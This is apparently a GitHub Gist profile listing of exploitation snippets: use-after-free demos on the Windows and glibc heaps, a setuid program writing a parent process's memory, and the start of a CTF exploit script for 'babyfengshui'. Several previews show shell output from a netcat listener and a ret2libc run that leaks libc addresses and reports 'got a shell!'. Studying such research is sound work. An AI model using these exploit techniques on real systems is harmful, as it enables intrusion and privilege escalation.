
@inaz2
inaz2 / Source.cpp
Created Jun 3, 2017
use-after-free on Low Fragmentation Heap (without /SDL, Windows 10, Visual Studio 2015)
#define WIN32_LEAN_AND_MEAN
#include <Windows.h>
#include <stdio.h>
class Cat {
    char name[0x20];
public:
    virtual void cry() { puts("meow"); }
};
@inaz2
inaz2 / test.c
Created Jun 3, 2017
use-after-free on glibc's ptmalloc (Ubuntu 16.04.2, Ubuntu GLIBC 2.23-0ubuntu7)
$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description: Ubuntu 16.04.2 LTS
Release: 16.04
Codename: xenial
$ /lib/x86_64-linux-gnu/libc.so.6
GNU C Library (Ubuntu GLIBC 2.23-0ubuntu7) stable release version 2.23, by Roland McGrath et al.
Copyright (C) 2016 Free Software Foundation, Inc.
View test.py
$ nc -v -l 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from [127.0.0.1] port 4444 [tcp/*] accepted (family 2, sport 50250)
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare)
View rails4_tamper_cookie.rb
View digits_tsne_scatter.ipynb
View digits_pca_scatter.ipynb
View iris_pca_scatter.ipynb
@inaz2
inaz2 / write_ppid_memory.c
Created Jan 4, 2017
write memory of the parent process via /proc/$PPID/mem
$ gcc write_ppid_memory.c -o write_ppid_memory
$ sudo chown root write_ppid_memory
$ sudo chmod u+s write_ppid_memory
$ ls -al
-rwsr-xr-x 1 root user 8984 Jan 4 14:35 write_ppid_memory*
-rw-r--r-- 1 user user 475 Jan 4 14:28 write_ppid_memory.c
View rec.py
$ python rec.py
[+] bin_base = 56580000
[+] libc_puts = f759f140
[+] libc_system = f757a940
[+] libc_binsh = f7698e8b
[+] got a shell!
id
uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),115(lpadmin),116(sambashare),999(docker)
View babyfengshui.py
from minipwn import *

def add_user(s, size_desc, name, text_len, text):
    recvuntil(s, 'Action: ')
    sendline(s, '0')
    recvuntil(s, 'size of description: ')
    sendline(s, str(size_desc))
    recvuntil(s, 'name: ')
    sendline(s, name)
    recvuntil(s, 'text length: ')